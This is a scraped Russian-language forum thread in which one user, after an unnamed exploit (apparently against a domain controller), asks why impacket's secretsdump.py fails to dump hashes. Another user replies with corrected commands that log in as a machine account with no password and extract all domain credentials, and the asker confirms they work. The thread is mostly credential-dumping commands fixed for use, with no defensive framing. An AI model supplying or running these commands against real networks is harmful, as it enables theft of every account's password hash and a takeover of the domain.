50cent RAID-массив Пользователь Регистрация 01.12.2021 Сообщения 62 Решения 1 Реакции 37 22.12.2021 Добавить закладку #1 При успешной эксплуатации не могу снять хэши через impacket secretsdump.py -just-dc-ntlm -no-pass (неправильные креды). Локально все отрабатывает как нужно. В чем может быть проблема?
При успешной эксплуатации не могу снять хэши через impacket secretsdump.py -just-dc-ntlm -no-pass (неправильные креды). Локально все отрабатывает как нужно. В чем может быть проблема?
Решение drug_v2 23.12.2021 secretsdump.py -no-pass -just-dc DOMAIN/PC\$@IP secretsdump.py -no-pass -just-dc DOMAIN/'PC$'@IP пробуй
secretsdump.py -no-pass -just-dc DOMAIN/PC\$@IP secretsdump.py -no-pass -just-dc DOMAIN/'PC$'@IP пробуй
drug_v2 floppy-диск Пользователь Регистрация 03.07.2021 Сообщения 5 Решения 1 Реакции 3 23.12.2021 Добавить закладку #2 secretsdump.py -no-pass -just-dc DOMAIN/PC\$@IP secretsdump.py -no-pass -just-dc DOMAIN/'PC$'@IP пробуй За 0 Против Решение
secretsdump.py -no-pass -just-dc DOMAIN/PC\$@IP secretsdump.py -no-pass -just-dc DOMAIN/'PC$'@IP пробуй
50cent RAID-массив Пользователь Регистрация 01.12.2021 Сообщения 62 Решения 1 Реакции 37 23.12.2021 Автор темы Добавить закладку #3 Я пробовал различные вариации, подставляя домен или воркгрупу. Сейчас опять протестировал и все получилось. За 0 Против
Я пробовал различные вариации, подставляя домен или воркгрупу. Сейчас опять протестировал и все получилось.